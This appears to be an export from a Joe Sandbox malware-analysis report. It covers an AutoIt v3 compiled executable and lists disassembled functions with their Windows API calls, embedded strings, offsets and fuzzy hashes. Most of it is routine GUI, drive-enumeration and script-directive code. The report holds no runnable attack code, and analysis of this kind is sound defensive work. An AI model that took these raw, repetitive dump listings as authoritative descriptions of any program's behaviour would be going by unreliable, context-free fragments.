GETSELECTED, xrefs: 00F838A3
UNCHECK, xrefs: 00F83883
ISCHECKED, xrefs: 00F83839
GETLINECOUNT, xrefs: 00F838C6
ISENABLED, xrefs: 00F8366B
DELSTRING, xrefs: 00F83749
HIDEDROPDOWN, xrefs: 00F83700
SELECTSTRING, xrefs: 00F83806
FINDSTRING, xrefs: 00F83776
EDITPASTE, xrefs: 00F8395F
TABRIGHT, xrefs: 00F8369D
GETLINE, xrefs: 00F8399B
GETCURRENTLINE, xrefs: 00F838ED
SHOWDROPDOWN, xrefs: 00F836E0
SENDCOMMANDID, xrefs: 00F839DA

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 64ad753340a7f6b6fc899a5b38d7783f9c3b90052cf3bc359b1ba904ec00e5da
Instruction ID: 192c33916adabfed0e320a55606d933a59762e2c116ca2d5e7655d3042ef5af1
Opcode Fuzzy Hash: 64ad753340a7f6b6fc899a5b38d7783f9c3b90052cf3bc359b1ba904ec00e5da
Instruction Fuzzy Hash: 87D18C716083019BCB04FF10C891AAE77E6AF95754F544468F8825B3B3DB79EA0AFB41

Function 00F8A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00F8A630
GetSysColorBrush.USER32(0000000F), ref: 00F8A661
GetSysColor.USER32(0000000F), ref: 00F8A66D
SetBkColor.GDI32(?,000000FF), ref: 00F8A687
SelectObject.GDI32(?,00000000), ref: 00F8A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00F8A6C1
GetSysColor.USER32(00000010), ref: 00F8A6C9
CreateSolidBrush.GDI32(00000000), ref: 00F8A6D0
FrameRect.USER32(?,?,00000000), ref: 00F8A6DF
DeleteObject.GDI32(00000000), ref: 00F8A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00F8A731
FillRect.USER32(?,?,00000000), ref: 00F8A763
GetWindowLongW.USER32(?,000000F0), ref: 00F8A78E

Part of subcall function 00F8A8CA: GetSysColor.USER32(00000012), ref: 00F8A903
Part of subcall function 00F8A8CA: SetTextColor.GDI32(?,?), ref: 00F8A907
Part of subcall function 00F8A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F8A91D
Part of subcall function 00F8A8CA: GetSysColor.USER32(0000000F), ref: 00F8A928
Part of subcall function 00F8A8CA: GetSysColor.USER32(00000011), ref: 00F8A945
Part of subcall function 00F8A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F8A953
Part of subcall function 00F8A8CA: SelectObject.GDI32(?,00000000), ref: 00F8A964
Part of subcall function 00F8A8CA: SetBkColor.GDI32(?,00000000), ref: 00F8A96D
Part of subcall function 00F8A8CA: SelectObject.GDI32(?,?), ref: 00F8A97A
Part of subcall function 00F8A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F8A999
Part of subcall function 00F8A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F8A9B0
Part of subcall function 00F8A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F8A9C5
Part of subcall function 00F8A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F8A9ED

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: d70ad8904b62a32f41053f37212cdade92f386c9d24bdd8a39d2f9e4b19945d0
Instruction ID: 89eacc30c685b24d0ffea802afaab97d56350a100f9561d93cc4f9a4c8f08646
Opcode Fuzzy Hash: d70ad8904b62a32f41053f37212cdade92f386c9d24bdd8a39d2f9e4b19945d0
Instruction Fuzzy Hash: 50918F72408705EFD710AF64DC08AAB7BA9FF49331F140B2AF962D61A0D770D948EB52

Function 00F02C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00F02CA2
DeleteObject.GDI32(00000000), ref: 00F02CE8
DeleteObject.GDI32(00000000), ref: 00F02CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00F02CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00F02D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00F3C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F3C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F3C89D

Part of subcall function 00F01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F02036,?,00000000,?,?,?,?,00F016CB,00000000,?), ref: 00F01B9A

SendMessageW.USER32(?,00001053), ref: 00F3C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F3C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F3C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F3C912

Strings

0, xrefs: 00F3C731

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 6785279a790a2b6f5b956603d37a556b377c099e08e7210bf889b5c24383127c
Instruction ID: 775a706667bcc67663011ba0b202eed580d03a3f8b96fb7ac0790008cdc2fb0a
Opcode Fuzzy Hash: 6785279a790a2b6f5b956603d37a556b377c099e08e7210bf889b5c24383127c
Instruction Fuzzy Hash: DA128131A00201DFDB55CF24C888BA9B7E5BF45334F588569E855EB2A2C731E845FBA1

Function 00F774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00F774DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F7759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F775DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F775ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F77633
GetClientRect.USER32(00000000,?), ref: 00F7763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F77683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F77692
GetStockObject.GDI32(00000011), ref: 00F776A2
SelectObject.GDI32(00000000,00000000), ref: 00F776A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F776B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F776BF
DeleteDC.GDI32(00000000), ref: 00F776C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F776F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00F7770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F77746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F7775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00F7776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F7779B
GetStockObject.GDI32(00000011), ref: 00F777A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F777B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F777BB

Strings

AutoIt v3, xrefs: 00F7762B
DISPLAY, xrefs: 00F77688
msctls_progress32, xrefs: 00F7773C
static, xrefs: 00F7767D, 00F77795

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: d140b79bb3c493547186abe01fb23c0d381c49413b6922555631fc5dcb91ec56
Instruction ID: 1e1bc8e28d5e00007ddc4b440c5e265928cc3c6dd4638ed6a47b1c1d6489e6eb
Opcode Fuzzy Hash: d140b79bb3c493547186abe01fb23c0d381c49413b6922555631fc5dcb91ec56
Instruction Fuzzy Hash: C0A170B1A00609BFEB14DBA4DD4AFEE7BA9EB04710F048115FA15A72E0D774AD44EB60

Function 00F6AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F6AD1E
GetDriveTypeW.KERNEL32(?,00F8FAC0,?,\\.\,00F8F910), ref: 00F6ADFB
SetErrorMode.KERNEL32(00000000,00F8FAC0,?,\\.\,00F8F910), ref: 00F6AF59

Strings

SATA, xrefs: 00F6AF0C
SSD, xrefs: 00F6AE86
Removable, xrefs: 00F6AE4D
PhysicalDrive, xrefs: 00F6ADA7
SAS, xrefs: 00F6AF05
SSA, xrefs: 00F6AEE2
FileBackedVirtual, xrefs: 00F6AF28
CDROM, xrefs: 00F6AE2F
Virtual, xrefs: 00F6AF21
RAID, xrefs: 00F6AEF7
USB, xrefs: 00F6AEF0
RAMDisk, xrefs: 00F6AE25
\\.\, xrefs: 00F6AD70
iSCSI, xrefs: 00F6AEFE
Network, xrefs: 00F6AE39
Fibre, xrefs: 00F6AEE9
ATA, xrefs: 00F6AED4
1394, xrefs: 00F6AEDB
Unknown, xrefs: 00F6AE1B, 00F6AEBF
SCSI, xrefs: 00F6AEC6
Fixed, xrefs: 00F6AE43
ATAPI, xrefs: 00F6AECD
MMC, xrefs: 00F6AF1A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: bed3523973e091cd599588ad02f937bec4b42698c5fa95335b0cfb102fae8459
Instruction ID: b5ca476a3d8c7965533541942171584138d420e17297ddd0d134187d4fc3cfa1
Opcode Fuzzy Hash: bed3523973e091cd599588ad02f937bec4b42698c5fa95335b0cfb102fae8459
Instruction Fuzzy Hash: 225183B1A48205ABCB00EB61CE92DFD73A9EF88750B208056E407B7295DA75DD42FF53

Function 00F068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F06931
__wcsnicmp.LIBCMT ref: 00F06949
__wcsnicmp.LIBCMT ref: 00F06961
__wcsnicmp.LIBCMT ref: 00F06979
__wcsnicmp.LIBCMT ref: 00F06991
__wcsnicmp.LIBCMT ref: 00F069A9
__wcsnicmp.LIBCMT ref: 00F069C1
__wcsnicmp.LIBCMT ref: 00F069D5
__wcsnicmp.LIBCMT ref: 00F06A16
__wcsnicmp.LIBCMT ref: 00F06A2A
__wcsnicmp.LIBCMT ref: 00F06A3E
__wcsnicmp.LIBCMT ref: 00F06A52

Strings

Unterminated group of comments, xrefs: 00F3E403
#OnAutoItStartRegister, xrefs: 00F06973
#cs, xrefs: 00F069CF, 00F06A24
#include, xrefs: 00F069A3
Cannot parse #include, xrefs: 00F3E3F0
#include-once, xrefs: 00F0698B
#notrayicon, xrefs: 00F06943
#requireadmin, xrefs: 00F0695B
#pragma compile, xrefs: 00F0692B
Bad directive syntax error, xrefs: 00F3E31A
#comments-start, xrefs: 00F069BB, 00F06A10
#ce, xrefs: 00F06A4C
#comments-end, xrefs: 00F06A38

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: fb0cafea498c9908b181d8489f786c38a0149ed598144573b0796539cf3beb09
Instruction ID: 08163f7f30ebbfab11f1dab6fbf86ab204d77d6db4419daabedd60efc93269fb
Opcode Fuzzy Hash: fb0cafea498c9908b181d8489f786c38a0149ed598144573b0796539cf3beb09
Instruction Fuzzy Hash: C68108B1B04216BADF20BB60EC42FAF3768AF15720F044024F905EA1D6EB78DE55F691

Function 00F89A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F89AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F89B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00F89BA7

Strings

0, xrefs: 00F89BE4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 4580f0adae535ad4ad010fc7f0963f56355d065869b5660f88f10088c76cafe3
Instruction ID: 4f5c02c0ced35da649133c9d4b2c010ba29851cd2514b0dfbfda7e800f4dafa8
Opcode Fuzzy Hash: 4580f0adae535ad4ad010fc7f0963f56355d065869b5660f88f10088c76cafe3
Instruction Fuzzy Hash: CE02ED31608201AFE729EF14CC49BFABBE4FF49324F08452DF995962A1C7B5D844EB52

Function 00F8A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00F8A903
SetTextColor.GDI32(?,?), ref: 00F8A907
GetSysColorBrush.USER32(0000000F), ref: 00F8A91D
GetSysColor.USER32(0000000F), ref: 00F8A928
CreateSolidBrush.GDI32(?), ref: 00F8A92D
GetSysColor.USER32(00000011), ref: 00F8A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F8A953
SelectObject.GDI32(?,00000000), ref: 00F8A964
SetBkColor.GDI32(?,00000000), ref: 00F8A96D
SelectObject.GDI32(?,?), ref: 00F8A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00F8A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F8A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F8A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F8A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F8AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00F8AA32
DrawFocusRect.USER32(?,?), ref: 00F8AA3D
GetSysColor.USER32(00000011), ref: 00F8AA4B
SetTextColor.GDI32(?,00000000), ref: 00F8AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F8AA67
SelectObject.GDI32(?,00F8A5FA), ref: 00F8AA7E
DeleteObject.GDI32(?), ref: 00F8AA89
SelectObject.GDI32(?,?), ref: 00F8AA8F
DeleteObject.GDI32(?), ref: 00F8AA94
SetTextColor.GDI32(?,?), ref: 00F8AA9A
SetBkColor.GDI32(?,?), ref: 00F8AAA4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 482c873d52aa8a3505cebc964331709820b577661c7d98c39bece46a22cb4fac
Instruction ID: aea236dbf4beecea880d99d901a97b40d46b847ebe5d983bde2f6dd4d442ff56
Opcode Fuzzy Hash: 482c873d52aa8a3505cebc964331709820b577661c7d98c39bece46a22cb4fac
Instruction Fuzzy Hash: 1A513C71900208EFDB10AFA4DC48EEE7B79EF08320F254226F911AB2A1D7759944EF90

Function 00F889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F88AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F88AD2
CharNextW.USER32(0000014E), ref: 00F88B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F88B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F88B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F88B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F88B86
SetWindowTextW.USER32(?,0000014E), ref: 00F88BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F88BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F88C1F
_memset.LIBCMT ref: 00F88C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F88C8D
_memset.LIBCMT ref: 00F88CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F88D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00F88D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00F88E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00F88E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F88E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F88EB4
DrawMenuBar.USER32(?), ref: 00F88EC3
SetWindowTextW.USER32(?,0000014E), ref: 00F88EEB

Strings

0, xrefs: 00F88E55

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: bf5c5de72224acb4ab2805696647c01394e7b9428ce7333a1cbf4a80629c2c96
Instruction ID: a5c16a01ea6acd0c08b4f8598050b32fb9118d70692c082c47e2f69ad79a2189
Opcode Fuzzy Hash: bf5c5de72224acb4ab2805696647c01394e7b9428ce7333a1cbf4a80629c2c96
Instruction Fuzzy Hash: DFE19071900219AFDF20AF50CC84EFE7BB9EF05760F508156FA15AB190DB749A86EF60

Function 00F8488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F849CA
GetDesktopWindow.USER32 ref: 00F849DF
GetWindowRect.USER32(00000000), ref: 00F849E6
GetWindowLongW.USER32(?,000000F0), ref: 00F84A48
DestroyWindow.USER32(?), ref: 00F84A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F84A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F84ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F84AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00F84AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F84B09
IsWindowVisible.USER32(?), ref: 00F84B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F84B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F84B58
GetWindowRect.USER32(?,?), ref: 00F84B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00F84B96
GetMonitorInfoW.USER32(00000000,?), ref: 00F84BB0
CopyRect.USER32(?,?), ref: 00F84BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00F84C32

Strings

(, xrefs: 00F84BA3
0, xrefs: 00F84975
tooltips_class32, xrefs: 00F84A96

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a0b91ad077e1dd3581871fbcf3cfcf6513754b06dd3f64effe85e6aaacd97e41
Instruction ID: 48786e2b151f23e662ca68733ac82e1c4ae55453bf0a4af76f403c59b35db1d0
Opcode Fuzzy Hash: a0b91ad077e1dd3581871fbcf3cfcf6513754b06dd3f64effe85e6aaacd97e41
Instruction Fuzzy Hash: 5AB18D71608341AFDB04EF64C844BAABBE4FF88314F008A1CF5999B2A1D775EC05EB55

Function 00F6449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F644AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F644D2
_wcscpy.LIBCMT ref: 00F64500
_wcscmp.LIBCMT ref: 00F6450B
_wcscat.LIBCMT ref: 00F64521
_wcsstr.LIBCMT ref: 00F6452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F64548
_wcscat.LIBCMT ref: 00F64591
_wcscat.LIBCMT ref: 00F64598
_wcsncpy.LIBCMT ref: 00F645C3

Strings

DefaultLangCodepage, xrefs: 00F645AB
04090000, xrefs: 00F6457E
\VarFileInfo\Translation, xrefs: 00F64540
%u.%u.%u.%u, xrefs: 00F64626
StringFileInfo\, xrefs: 00F6451B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 43024755f0c962e5b600527afa659542d2b36a020a094b3767ef84a10739d5e6
Instruction ID: 0890c35dfefe7d8d5524b7535c8a7e8759efc83dabe30245c16a88d041defd20
Opcode Fuzzy Hash: 43024755f0c962e5b600527afa659542d2b36a020a094b3767ef84a10739d5e6
